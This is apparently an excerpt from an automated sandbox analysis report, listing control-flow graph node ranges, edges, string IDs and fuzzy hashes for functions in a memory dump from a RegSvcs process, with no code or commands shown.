247->212 247->218 254->246 260 63d3d2d 254->260 255->254 260->247 261->262 264 63d3dca-63d3dd5 262->264 265 63d3db5-63d3dc0 262->265 268 63d3ded-63d3e75 264->268 269 63d3dd7-63d3ddd 264->269 265->264 270 63d3dc2 265->270 268->247 271 63d3ddf 269->271 272 63d3de1-63d3de3 269->272 270->264 271->268 272->268 285->155 286->155
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $fq$$fq$$fq$$fq
                                                                                        • API String ID: 0-2113499236
                                                                                        • Opcode ID: db377a60b94f88632a4f0f1dc8a7f288db76e3a724a0859a38b5bdfa339a55c0
                                                                                        • Instruction ID: 3c4b59307f9ef68c6c9016f4b705e4578728a7c87c589abc8358d256a6f4bff0
                                                                                        • Opcode Fuzzy Hash: db377a60b94f88632a4f0f1dc8a7f288db76e3a724a0859a38b5bdfa339a55c0
                                                                                        • Instruction Fuzzy Hash: D6424131E106198BDB14EB75C9546EEB7F2FFC9340F1086A9D509A7264EF309E85CB81

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 713 63d82b8-63d82d6 714 63d82d8-63d82db 713->714 715 63d82dd-63d82eb 714->715 716 63d82f6-63d82f9 714->716 722 63d82f1 715->722 723 63d8370-63d8386 715->723 717 63d8328-63d832b 716->717 718 63d82fb-63d8323 716->718 720 63d832d-63d8349 717->720 721 63d834e-63d8351 717->721 718->717 720->721 724 63d835e-63d8360 721->724 725 63d8353-63d835d 721->725 722->716 733 63d838c-63d8395 723->733 734 63d85be-63d85c8 723->734 727 63d8367-63d836a 724->727 728 63d8362 724->728 727->714 727->723 728->727 736 63d85c9-63d85ff 733->736 737 63d839b-63d83c0 733->737 741 63d8601-63d8604 736->741 753 63d85ab-63d85b8 737->753 754 63d83c6-63d83f6 737->754 742 63d8627-63d862a 741->742 743 63d8606-63d8622 741->743 745 63d8899-63d889c 742->745 746 63d8630-63d863f 742->746 743->742 748 63d8962-63d8964 745->748 749 63d88a2-63d88c7 745->749 758 63d865e-63d86a2 746->758 759 63d8641-63d865c 746->759 751 63d896b-63d896e 748->751 752 63d8966 748->752 774 63d88ce-63d88d0 749->774 751->741 756 63d8974-63d897d 751->756 752->751 753->733 753->734 754->753 773 63d83fc-63d8405 754->773 766 63d886d-63d8882 758->766 767 63d86a8-63d86b9 758->767 759->758 766->745 775 63d86bf-63d86e2 767->775 776 63d8858-63d8867 767->776 773->736 777 63d840b-63d842d 773->777 778 63d88e8-63d88ec 774->778 779 63d88d2-63d88d8 774->779 775->776 796 63d86e8-63d8812 call 63d6918 775->796 776->766 776->767 794 63d8599-63d85a5 777->794 795 63d8433-63d845b 777->795 780 63d88ee-63d88f8 778->780 781 63d88fa 778->781 783 63d88dc-63d88de 779->783 784 63d88da 779->784 786 63d88ff-63d8901 780->786 781->786 783->778 784->778 788 63d8903-63d8906 786->788 789 63d8912-63d8951 786->789 788->756 789->746 812 63d8957-63d8961 789->812 794->753 794->773 805 63d858f-63d8594 795->805 806 63d8461-63d8489 795->806 863 63d8814-63d881e 796->863 864 63d8820 796->864 805->794 806->805 815 63d848f-63d84bd 806->815 815->805 820 63d84c3-63d84cd 815->820 820->805 822 63d84d3-63d850d 820->822 832 63d850f-63d8513 822->832 833 63d8518-63d8534 822->833 832->805 834 63d8515 832->834 833->794 835 63d8536-63d858d call 63d6918 833->835 834->833 835->794 865 63d8825-63d8827 863->865 864->865 865->776 866 63d8829-63d882e 865->866 867 63d883c 866->867 868 63d8830-63d883a 866->868 869 63d8841-63d8843 867->869 868->869 869->776 870 63d8845-63d8851 869->870 870->776
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $fq$$fq
                                                                                        • API String ID: 0-2537786760
                                                                                        • Opcode ID: 82d9206112bf9f1eb3b9c077c9bffc089942ff4fe3c44319659dfd86649c4e2b
                                                                                        • Instruction ID: ee000810d12dd21bc7a41d5a58996f50749b0c9ea1489f0a2c165ac9b22c3d01
                                                                                        • Opcode Fuzzy Hash: 82d9206112bf9f1eb3b9c077c9bffc089942ff4fe3c44319659dfd86649c4e2b
                                                                                        • Instruction Fuzzy Hash: F202B031B002198FDB54EB79E950AAEB7E2FF84340F148429E506EB395DE35EC4687C1

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1624 63d58d8-63d58f5 1625 63d58f7-63d58fa 1624->1625 1626 63d58fc-63d5902 1625->1626 1627 63d5909-63d590c 1625->1627 1628 63d5904 1626->1628 1629 63d5960-63d5963 1626->1629 1630 63d590e-63d591b 1627->1630 1631 63d5920-63d5923 1627->1631 1628->1627 1632 63d5968-63d596b 1629->1632 1630->1631 1633 63d595b-63d595e 1631->1633 1634 63d5925-63d592b 1631->1634 1637 63d596d-63d5976 1632->1637 1638 63d5977-63d597a 1632->1638 1633->1629 1633->1632 1635 63d5aac-63d5adb 1634->1635 1636 63d5931-63d5939 1634->1636 1652 63d5ae5-63d5ae8 1635->1652 1636->1635 1640 63d593f-63d594c 1636->1640 1641 63d597c-63d598b 1638->1641 1642 63d5990-63d5993 1638->1642 1640->1635 1643 63d5952-63d5956 1640->1643 1641->1642 1645 63d599b-63d599e 1642->1645 1646 63d5995-63d5996 1642->1646 1643->1633 1648 63d59b8-63d59bb 1645->1648 1649 63d59a0-63d59aa 1645->1649 1646->1645 1650 63d59bd-63d59d3 1648->1650 1651 63d59d8-63d59db 1648->1651 1653 63d59b1-63d59b3 1649->1653 1650->1651 1654 63d59dd-63d59fa 1651->1654 1655 63d59ff-63d5a02 1651->1655 1656 63d5aea-63d5af1 1652->1656 1657 63d5af2-63d5af5 1652->1657 1653->1648 1654->1655 1661 63d5a09-63d5a0f 1655->1661 1662 63d5a04-63d5a07 1655->1662 1659 63d5b09-63d5b0c 1657->1659 1660 63d5af7-63d5afe 1657->1660 1667 63d5b1d-63d5b20 1659->1667 1668 63d5b0e-63d5b18 1659->1668 1664 63d5b04 1660->1664 1665 63d5bc6-63d5bcd 1660->1665 1661->1634 1669 63d5a15 1661->1669 1662->1661 1666 63d5a1a-63d5a1d 1662->1666 1664->1659 1670 63d5a1f-63d5a22 1666->1670 1671 63d5a27-63d5a2a 1666->1671 1672 63d5b42-63d5b45 1667->1672 1673 63d5b22-63d5b26 1667->1673 1668->1667 1669->1666 1670->1671 1675 63d5a2c-63d5a30 1671->1675 1676 63d5a37-63d5a3a 1671->1676 1679 63d5b5d-63d5b60 1672->1679 1680 63d5b47-63d5b58 1672->1680 1677 63d5b2c-63d5b34 1673->1677 1678 63d5bce-63d5c0c 1673->1678 1682 63d5a9e-63d5aab 1675->1682 1683 63d5a32 1675->1683 1685 63d5a3c-63d5a3e 1676->1685 1686 63d5a41-63d5a44 1676->1686 1677->1678 1684 63d5b3a-63d5b3d 1677->1684 1700 63d5c0e-63d5c11 1678->1700 1687 63d5b7a-63d5b7d 1679->1687 1688 63d5b62-63d5b66 1679->1688 1680->1679 1683->1676 1684->1672 1685->1686 1689 63d5a4b-63d5a51 1686->1689 1690 63d5a46-63d5a49 1686->1690 1694 63d5b7f-63d5b83 1687->1694 1695 63d5b97-63d5b9a 1687->1695 1688->1678 1693 63d5b68-63d5b70 1688->1693 1689->1649 1699 63d5a57 1689->1699 1690->1689 1698 63d5a5c-63d5a5f 1690->1698 1693->1678 1701 63d5b72-63d5b75 1693->1701 1694->1678 1702 63d5b85-63d5b8d 1694->1702 1696 63d5b9c-63d5ba0 1695->1696 1697 63d5bb4-63d5bb6 1695->1697 1696->1678 1704 63d5ba2-63d5baa 1696->1704 1705 63d5bbd-63d5bc0 1697->1705 1706 63d5bb8 1697->1706 1707 63d5a6d-63d5a70 1698->1707 1708 63d5a61-63d5a68 1698->1708 1699->1698 1709 63d5c29-63d5c2c 1700->1709 1710 63d5c13-63d5c26 1700->1710 1701->1687 1702->1678 1703 63d5b8f-63d5b92 1702->1703 1703->1695 1704->1678 1713 63d5bac-63d5baf 1704->1713 1705->1652 1705->1665 1706->1705 1714 63d5a8c-63d5a8e 1707->1714 1715 63d5a72-63d5a87 1707->1715 1708->1707 1711 63d5c2e-63d5c35 1709->1711 1712 63d5c3a-63d5c3d 1709->1712 1711->1712 1718 63d5ce0-63d5e82 1712->1718 1719 63d5c43-63d5c46 1712->1719 1713->1697 1716 63d5a95-63d5a98 1714->1716 1717 63d5a90 1714->1717 1715->1714 1716->1625 1716->1682 1717->1716 1779 63d5fbe-63d5fd1 1718->1779 1780 63d5e88-63d5e8f 1718->1780 1721 63d5c48-63d5c4f 1719->1721 1722 63d5c54-63d5c57 1719->1722 1721->1722 1722->1718 1725 63d5c5d-63d5c60 1722->1725 1726 63d5c80-63d5c83 1725->1726 1727 63d5c62-63d5c79 1725->1727 1729 63d5c85-63d5c9c 1726->1729 1730 63d5ca7-63d5caa 1726->1730 1727->1721 1743 63d5c7b 1727->1743 1744 63d5fd9-63d5ff0 1729->1744 1746 63d5ca2 1729->1746 1731 63d5cac-63d5cc3 1730->1731 1732 63d5cca-63d5ccd 1730->1732 1731->1721 1752 63d5cc5 1731->1752 1736 63d5ccf-63d5cd4 1732->1736 1737 63d5cd7-63d5cda 1732->1737 1736->1737 1737->1718 1740 63d5fd4-63d5fd7 1737->1740 1740->1744 1745 63d5ffb-63d5ffe 1740->1745 1743->1726 1744->1721 1759 63d5ff6 1744->1759 1747 63d6000-63d6017 1745->1747 1748 63d6022-63d6024 1745->1748 1746->1730 1747->1710 1761 63d601d 1747->1761 1753 63d602b-63d602e 1748->1753 1754 63d6026 1748->1754 1752->1732 1753->1700 1756 63d6034-63d603d 1753->1756 1754->1753 1759->1745 1761->1748 1781 63d5f49-63d5f50 1780->1781 1782 63d5e95-63d5ec8 1780->1782 1781->1779 1783 63d5f52-63d5f85 1781->1783 1793 63d5ecd-63d5f14 1782->1793 1794 63d5eca 1782->1794 1795 63d5f8a-63d5fb7 1783->1795 1796 63d5f87 1783->1796 1805 63d5f2c-63d5f33 1793->1805 1806 63d5f16-63d5f27 1793->1806 1794->1793 1795->1756 1795->1779 1796->1795 1808 63d5f3b-63d5f3d 1805->1808 1806->1756 1808->1756
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $
                                                                                        • API String ID: 0-3993045852
                                                                                        • Opcode ID: f4aaed31ddacd033469f15e1ff3dde3bfe97a2d7644f81c3f575e27215c66e57
                                                                                        • Instruction ID: 8e16dfa3b12bd9c5eda8128bea96968aa4809b243c95eb3f4d7b98c16a68579f
                                                                                        • Opcode Fuzzy Hash: f4aaed31ddacd033469f15e1ff3dde3bfe97a2d7644f81c3f575e27215c66e57
                                                                                        • Instruction Fuzzy Hash: 0622D372F002198FDF61DBA8D4806AEB7B2EF85360F248469E515EB394DA35DC45CBD0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5b48db19e8431e6295f15d584dca4cc2f355986bbaac24ff2744aeb10e98eff6
                                                                                        • Instruction ID: 0cf289133596ab1f858004d7676bbe92c76e96404a020aac5953a5bde61cea76
                                                                                        • Opcode Fuzzy Hash: 5b48db19e8431e6295f15d584dca4cc2f355986bbaac24ff2744aeb10e98eff6
                                                                                        • Instruction Fuzzy Hash: 8E62AF31B002088FDB54DB68E991AAEB7F2EF85350F148469E416EB391DB35ED46CBD0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8f164ba15effd4cd807645a329b0bab259b8a07fd9ca6346fb45104269092265
                                                                                        • Instruction ID: 7d504411ceb63b0837a06bb2831c0556ab3627794a5ac6a6adb7685bec9ac376
                                                                                        • Opcode Fuzzy Hash: 8f164ba15effd4cd807645a329b0bab259b8a07fd9ca6346fb45104269092265
                                                                                        • Instruction Fuzzy Hash: F0426E31B001099BDB54EBB8E891BAEB7B2FF84350F108429E506EB395DE35DC4687D1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bc4c81bc2b7ce3bc1c5f4bf815c9cd83e7db53f25203535d0808da47054df2e0
                                                                                        • Instruction ID: 57400f0942ac114e87698bac1c6907fa7d329af0f4f37892824f6d240c81f5df
                                                                                        • Opcode Fuzzy Hash: bc4c81bc2b7ce3bc1c5f4bf815c9cd83e7db53f25203535d0808da47054df2e0
                                                                                        • Instruction Fuzzy Hash: 53227F71E101098BDF64DBA8E8907AEB7B6FB49350F209426E506EB391CA34DC85DBD1

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 0 63db6a8-63db6c6 1 63db6c8-63db6cb 0->1 2 63db6cd-63db6e0 1->2 3 63db6e5-63db6e8 1->3 2->3 4 63db6f9-63db6fc 3->4 5 63db6ea-63db6ee 3->5 9 63db71f-63db722 4->9 10 63db6fe-63db71a 4->10 7 63db6f4 5->7 8 63db8f6-63db900 5->8 7->4 11 63db72c-63db72f 9->11 12 63db724-63db729 9->12 10->9 14 63db749-63db74c 11->14 15 63db731-63db73a 11->15 12->11 16 63db74e-63db75b 14->16 17 63db760-63db763 14->17 18 63db901-63db936 15->18 19 63db740-63db744 15->19 16->17 20 63db765-63db772 17->20 21 63db777-63db77a 17->21 32 63db938-63db93b 18->32 19->14 20->21 25 63db8e7-63db8f0 21->25 26 63db780-63db782 21->26 25->8 25->15 28 63db789-63db78c 26->28 29 63db784 26->29 28->1 31 63db792-63db7bc 28->31 29->28 48 63db8e4 31->48 49 63db7c2-63db7d7 31->49 33 63db93d-63db947 32->33 34 63db948-63db94b 32->34 36 63db94d-63db951 34->36 37 63db958-63db95b 34->37 39 63db961-63db99c 36->39 40 63db953 36->40 37->39 41 63dbbfc-63dbbff 37->41 52 63dbbc7-63dbbda 39->52 53 63db9a2-63db9ae 39->53 40->37 42 63dbc01-63dbc1d 41->42 43 63dbc22-63dbc25 41->43 42->43 45 63dbc34-63dbc36 43->45 46 63dbc27 call 63dbc58 43->46 50 63dbc3d-63dbc40 45->50 51 63dbc38 45->51 55 63dbc2d-63dbc2f 46->55 48->25 65 63db7ef-63db830 call 63d6918 49->65 66 63db7d9-63db7df 49->66 50->32 56 63dbc46-63dbc50 50->56 51->50 57 63dbbdc 52->57 61 63db9ce-63dba12 53->61 62 63db9b0-63db9c9 53->62 55->45 57->41 78 63dba2e-63dba6d 61->78 79 63dba14-63dba26 61->79 62->57 88 63db848-63db865 65->88 89 63db832-63db838 65->89 67 63db7e1 66->67 68 63db7e3-63db7e5 66->68 67->65 68->65 83 63dbb8c-63dbba1 78->83 84 63dba73-63dbb86 call 63d6918 78->84 79->78 83->52 84->83 99 63db87d-63db894 88->99 100 63db867-63db86d 88->100 91 63db83c-63db83e 89->91 92 63db83a 89->92 91->88 92->88 108 63db8ac-63db8dd 99->108 109 63db896-63db89c 99->109 102 63db86f 100->102 103 63db871-63db873 100->103 102->99 103->99 108->48 111 63db89e 109->111 112 63db8a0-63db8a2 109->112 111->108 112->108
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq
                                                                                        • API String ID: 0-3929485403
                                                                                        • Opcode ID: b9f807628d4bcc4a010a343df176f4eda279c0aa304915922e568f7b19cc500f
                                                                                        • Instruction ID: 0ebfa801606cdfbb62fc4ac08d38eb26d3487e1ee79ef0bf23e681b4ac8862ab
                                                                                        • Opcode Fuzzy Hash: b9f807628d4bcc4a010a343df176f4eda279c0aa304915922e568f7b19cc500f
                                                                                        • Instruction Fuzzy Hash: 7EE18F71E002098FDB64DBB9E8906AEB7B2FF85300F118529E506EB355DF359846CB91

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 287 63d97e0-63d9805 288 63d9807-63d980a 287->288 289 63da25e-63da261 288->289 290 63d9810-63d9845 288->290 291 63da287-63da289 289->291 292 63da263-63da282 289->292 301 63d985d-63d9893 290->301 302 63d9847-63d984d 290->302 294 63da28b 291->294 295 63da290-63da293 291->295 292->291 294->295 295->288 297 63da299-63da2a3 295->297 308 63d989e-63d98ab 301->308 303 63d984f 302->303 304 63d9851-63d9853 302->304 303->301 304->301 309 63d98ad-63d98b9 308->309 310 63d98d5 308->310 311 63d98bb-63d98c1 309->311 312 63d98c3-63d98c9 309->312 313 63d98db-63d9964 310->313 314 63d98d3 311->314 312->314 324 63d99a9-63d99df 313->324 325 63d9966-63d99a2 313->325 314->313 332 63d9a24-63d9a5a 324->332 333 63d99e1-63d9a1d 324->333 325->324 340 63d9a5c-63d9a98 332->340 341 63d9a9f-63d9ad5 332->341 333->332 340->341 348 63d9b1a-63d9b28 341->348 349 63d9ad7-63d9b13 341->349 350 63d9b38-63d9baf 348->350 351 63d9b2a-63d9b33 348->351 349->348 358 63d9c08-63d9c1d 350->358 359 63d9bb1-63d9bd5 350->359 351->297 358->289 364 63d9bf7-63d9c06 359->364 365 63d9bd7-63d9bec 359->365 364->358 364->359 365->364
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $fq$$fq$$fq$$fq
                                                                                        • API String ID: 0-2113499236
                                                                                        • Opcode ID: ee4e8e8bc89c273cf6db1a4e1f9448b5a2f8e3f403c6290a12f4fa7dde496707
                                                                                        • Instruction ID: bc0c9a91f6bd4ee4924788d102c2e62b64a78bf589313c9baf468e92a49d1fd1
                                                                                        • Opcode Fuzzy Hash: ee4e8e8bc89c273cf6db1a4e1f9448b5a2f8e3f403c6290a12f4fa7dde496707
                                                                                        • Instruction Fuzzy Hash: 57C15931E002198FDB64DF65D991BEEB7B2FF88340F1085A9D509AB394DB319E818F91

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 369 63ddf88-63ddfa9 370 63ddfab-63ddfae 369->370 371 63ddfce-63ddfd1 370->371 372 63ddfb0-63ddfc9 370->372 373 63de028-63de02b 371->373 374 63ddfd3-63de023 371->374 372->371 376 63de02d-63de03f 373->376 377 63de080-63de083 373->377 374->373 381 63de04e-63de05d 376->381 382 63de041-63de046 376->382 379 63de0d8-63de0db 377->379 380 63de085-63de097 377->380 383 63de0dd-63de12d 379->383 384 63de132-63de135 379->384 387 63de099-63de09e 380->387 388 63de0a6-63de0b5 380->388 385 63debe0-63dec16 381->385 386 63de063-63de07b 381->386 382->381 383->384 390 63de13b-63de13e 384->390 391 63de525-63de534 384->391 404 63dec18-63dec1b 385->404 386->377 387->388 388->385 393 63de0bb-63de0d3 388->393 394 63de195-63de198 390->394 395 63de140-63de190 390->395 391->376 398 63de53a-63de94c 391->398 393->379 402 63de1ef-63de1f2 394->402 403 63de19a-63de1ea 394->403 395->394 611 63debd2-63debdf 398->611 612 63de952-63de95b 398->612 411 63de1f4-63de1f6 402->411 412 63de201-63de204 402->412 403->402 405 63dec1d-63dec39 404->405 406 63dec3e-63dec41 404->406 405->406 417 63dec74-63dec77 406->417 418 63dec43-63dec6f 406->418 420 63de1fc 411->420 421 63de522 411->421 413 63de22a-63de22d 412->413 414 63de206-63de225 412->414 423 63de22f-63de27f 413->423 424 63de284-63de287 413->424 414->413 426 63dec79 call 63ded41 417->426 427 63dec86-63dec88 417->427 418->417 420->412 421->391 423->424 432 63de2de-63de2e1 424->432 433 63de289-63de2d9 424->433 442 63dec7f-63dec81 426->442 435 63dec8f-63dec92 427->435 436 63dec8a 427->436 437 63de338-63de33b 432->437 438 63de2e3-63de333 432->438 433->432 435->404 444 63dec94-63deca3 435->444 436->435 447 63de33d-63de38d 437->447 448 63de392-63de395 437->448 438->437 442->427 460 63deca5-63ded10 call 63d6918 444->460 461 63ded12-63ded27 444->461 447->448 458 63de397-63de399 448->458 459 63de3a0-63de3a3 448->459 467 63de3bf-63de3cb 458->467 468 63de39b 458->468 462 63de3ad-63de3af 459->462 463 63de3a5-63de3aa 459->463 460->461 470 63de3b6-63de3b9 462->470 471 63de3b1 462->471 463->462 473 63de3cd-63de3d2 467->473 474 63de3da-63de3e9 467->474 468->459 470->370 470->467 471->470 473->474 480 63de3ef-63de409 474->480 481 63de512-63de517 474->481 480->421 505 63de40f-63de421 480->505 481->421 514 63de445-63de447 505->514 515 63de423-63de429 505->515 517 63de451-63de464 514->517 519 63de42d-63de439 515->519 520 63de42b 515->520 517->421 531 63de46a-63de48c call 63d6918 517->531 522 63de43b-63de443 519->522 520->522 522->517 539 63de48e-63de493 531->539 540 63de49b-63de4aa 531->540 539->540 540->481 542 63de4ac-63de510 540->542 542->421 613 63de95d-63de962 612->613 614 63de96a-63de976 612->614 613->614 614->385 615 63de97c-63de990 614->615 618 63debbf-63debcc 615->618 619 63de996-63de99f 615->619 618->611 618->612 620 63de9ae-63de9ba 619->620 621 63de9a1-63de9a6 619->621 620->385 622 63de9c0-63de9ef 620->622 621->620 626 63de9fe-63dea0a 622->626 627 63de9f1-63de9f6 622->627 626->385 628 63dea10-63dea39 626->628 627->626 628->618 631 63dea3f-63dea48 628->631 631->385 632 63dea4e-63dea6a 631->632 634 63debaf-63debb9 632->634 635 63dea70-63dea9f 632->635 634->618 634->631 635->385 639 63deaa5-63deaaf 635->639 639->385 640 63deab5-63deacc 639->640 642 63deace-63dead9 640->642 643 63deadb-63deafc 640->643 642->643 643->634 648 63deb02-63deb1e call 63d6918 643->648 652 63deb2d-63deb39 648->652 653 63deb20-63deb25 648->653 652->385 654 63deb3f-63deba8 652->654 653->652 654->634
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $fq$$fq$$fq
                                                                                        • API String ID: 0-837900676
                                                                                        • Opcode ID: cc6d7a0b3c2ccb1766c84613b9359d418145d02c03435df5318c3784f7fb7915
                                                                                        • Instruction ID: d307034c956cdc17fed694c413c0a748293e7424728effdbd5f553ec0df8d339
                                                                                        • Opcode Fuzzy Hash: cc6d7a0b3c2ccb1766c84613b9359d418145d02c03435df5318c3784f7fb7915
                                                                                        • Instruction Fuzzy Hash: 7572A235B002188FDB64EB68C951B6EB7B3FF84340F2084A9D50AAB395DF359D85CB91

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 664 63d4e98-63d4ebc 665 63d4ebe-63d4ec1 664->665 666 63d4ec3-63d4edd 665->666 667 63d4ee2-63d4ee5 665->667 666->667 668 63d55cd-63d55cf 667->668 669 63d4eeb-63d4fb6 667->669 671 63d55d6-63d55d9 668->671 672 63d55d1 668->672 688 63d4fbc-63d500e call 63d5748 669->688 689 63d503e-63d5045 669->689 671->665 673 63d55df-63d55ec 671->673 672->671 704 63d5014-63d5030 688->704 690 63d50cc-63d50d5 689->690 691 63d504b-63d50be 689->691 690->673 710 63d50c9 691->710 711 63d50c0 691->711 707 63d503b 704->707 708 63d5032 704->708 707->689 708->707 710->690 711->710
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: fkq$XPkq$\Okq
                                                                                        • API String ID: 0-673657909
                                                                                        • Opcode ID: 38aeb5cba67ba1d93b4df588e0613566ab7283cf013103fd95ca5f64a5aabd1a
                                                                                        • Instruction ID: 6ec2cf264b46c80f8207d068f7731b713058f82bef9d7472ae33626c8c454621
                                                                                        • Opcode Fuzzy Hash: 38aeb5cba67ba1d93b4df588e0613566ab7283cf013103fd95ca5f64a5aabd1a
                                                                                        • Instruction Fuzzy Hash: CE51B231F002189FEB549BA9D8147AEBAF6FF88354F208429E506EB3D5DE794C058BD1

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1394 63d97cf-63d9805 1397 63d9807-63d980a 1394->1397 1398 63da25e-63da261 1397->1398 1399 63d9810-63d9845 1397->1399 1400 63da287-63da289 1398->1400 1401 63da263-63da282 1398->1401 1410 63d985d-63d9893 1399->1410 1411 63d9847-63d984d 1399->1411 1403 63da28b 1400->1403 1404 63da290-63da293 1400->1404 1401->1400 1403->1404 1404->1397 1406 63da299-63da2a3 1404->1406 1417 63d989e-63d98ab 1410->1417 1412 63d984f 1411->1412 1413 63d9851-63d9853 1411->1413 1412->1410 1413->1410 1418 63d98ad-63d98b9 1417->1418 1419 63d98d5 1417->1419 1420 63d98bb-63d98c1 1418->1420 1421 63d98c3-63d98c9 1418->1421 1422 63d98db-63d9964 1419->1422 1423 63d98d3 1420->1423 1421->1423 1433 63d99a9-63d99df 1422->1433 1434 63d9966-63d99a2 1422->1434 1423->1422 1441 63d9a24-63d9a5a 1433->1441 1442 63d99e1-63d9a1d 1433->1442 1434->1433 1449 63d9a5c-63d9a98 1441->1449 1450 63d9a9f-63d9ad5 1441->1450 1442->1441 1449->1450 1457 63d9b1a-63d9b28 1450->1457 1458 63d9ad7-63d9b13 1450->1458 1459 63d9b38-63d9baf 1457->1459 1460 63d9b2a-63d9b33 1457->1460 1458->1457 1467 63d9c08-63d9c1d 1459->1467 1468 63d9bb1-63d9bd5 1459->1468 1460->1406 1467->1398 1473 63d9bf7-63d9c06 1468->1473 1474 63d9bd7-63d9bec 1468->1474 1473->1467 1473->1468 1474->1473
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.4121661839.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_63d0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $fq$$fq
                                                                                        • API String ID: 0-2537786760
                                                                                        • Opcode ID: 1a8931013fc5afac57d898ea6640285e4fc158b4056550aaf52fb989a5978e78
                                                                                        • Instruction ID: 267f7ecec6c55019e2c024d26ed75337334220ee3d14ef13710f3cdca70877dc
                                                                                        • Opcode Fuzzy Hash: 1a8931013fc5afac57d898ea6640285e4fc158b4056550aaf52fb989a5978e78
                                                                                        • Instruction Fuzzy Hash: B4912871E002198FDB64DB68D991BEEB7B2FF48740F0084A9D509A7394DA309E85CF91

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
